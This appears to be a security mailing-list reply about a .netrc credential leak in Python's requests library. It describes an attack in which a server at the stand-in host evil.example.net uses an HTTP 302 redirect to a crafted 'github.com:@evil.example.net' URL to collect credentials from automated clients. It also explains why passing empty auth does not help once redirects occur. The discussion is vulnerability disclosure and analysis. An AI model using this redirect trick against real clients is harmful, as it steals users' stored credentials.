* Alan Coopersmith <alan.coopersm...@oracle.com>, 2025-06-03 10:09:
I'm not sure how the attacker is supposed to get the victim to make a
requests call using a URL the attacker controls
The attacker could set a public HTTP server at
<http://evil.example.net/> that redirects (via HTTP 302) everything to,
say, <http://github.com:@evil.example.net>. Then they would only need to
wait patiently for a visit from a robot that has requests under the
hood.
* Juho Forsén, 2025-05-31 06:30:
As a workaround, clients may explicitly specify the credentials used on
every API call to disable .netrc access.
I'm not aware of any good way to disable netrc support in requests:
https://github.com/requests/requests/issues/2773
In particular, AFAICT something like
requests.get("http://evil.example.net/";, auth=("", ""))
(that was alluded by Juho) doesn't help in the presence of redirects.
The redirected URL would still be fetched with netrc auth.
--
Jakub Wilk
